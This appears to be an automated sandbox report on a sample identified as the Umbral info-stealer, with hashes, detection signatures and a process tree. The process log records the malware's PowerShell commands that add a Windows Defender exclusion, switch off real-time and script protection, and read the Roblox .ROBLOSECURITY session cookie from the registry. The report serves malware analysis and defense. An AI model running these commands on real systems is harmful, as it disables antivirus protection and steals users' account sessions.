Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    16-01-2025 03:45

General

  • Target

    f40fdb9a6d6ce049437de3aabf212a6ce2eaaaf48bd478d691164c5ea32dc22dN.exe

  • Size

    231KB

  • MD5

    6b1466bbf3d206c9a9851a6b5626dc70

  • SHA1

    d9039fe892d5f6da31462eb577f9377f359031d2

  • SHA256

    f40fdb9a6d6ce049437de3aabf212a6ce2eaaaf48bd478d691164c5ea32dc22d

  • SHA512

    77777aff4d363334409d8b0b47c2006aff5c904641892ecba3038a0be755e3ac70c63d413e251baf185e7d4d47f38fd1ff2f5e75cbffbc44de22c3abbf2f4cef

  • SSDEEP

    6144:xloZMffsXtioRkts/cnnK6cMltMMjw2xpaBPyAxVkElb8e1mhzLHi:DoZdtlRk83MltMMjw2xpaBPyAxVkAMW

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f40fdb9a6d6ce049437de3aabf212a6ce2eaaaf48bd478d691164c5ea32dc22dN.exe
    "C:\Users\Admin\AppData\Local\Temp\f40fdb9a6d6ce049437de3aabf212a6ce2eaaaf48bd478d691164c5ea32dc22dN.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\f40fdb9a6d6ce049437de3aabf212a6ce2eaaaf48bd478d691164c5ea32dc22dN.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2796
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2464
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2976
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:2128
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1536
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2940

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        650ffa523273e05647c6faf97f33e46b

        SHA1

        0015c415215c4b1bd2a158dec51b958101c6c92f

        SHA256

        b0bb4cf5a6d0977cca7f3c7369c2c6b515b91432c2c975969820d9946b67c81b

        SHA512

        9da843815395e4acefd87109725d9608234526e9c4845987c3d25d82873bfbbe300f24e313074e558c409a11379454405f29b893acb7f34f1603e7f23f398a62

      • memory/1536-41-0x0000000001D90000-0x0000000001D98000-memory.dmp

        Filesize

        32KB

      • memory/2100-0-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp

        Filesize

        4KB

      • memory/2100-1-0x0000000000A90000-0x0000000000AD0000-memory.dmp

        Filesize

        256KB

      • memory/2100-2-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

        Filesize

        9.9MB

      • memory/2100-45-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

        Filesize

        9.9MB

      • memory/2796-7-0x000000001B6A0000-0x000000001B982000-memory.dmp

        Filesize

        2.9MB

      • memory/2796-8-0x0000000002250000-0x0000000002258000-memory.dmp

        Filesize

        32KB

      • memory/2900-14-0x000000001B5A0000-0x000000001B882000-memory.dmp

        Filesize

        2.9MB

      • memory/2900-15-0x0000000001E80000-0x0000000001E88000-memory.dmp

        Filesize

        32KB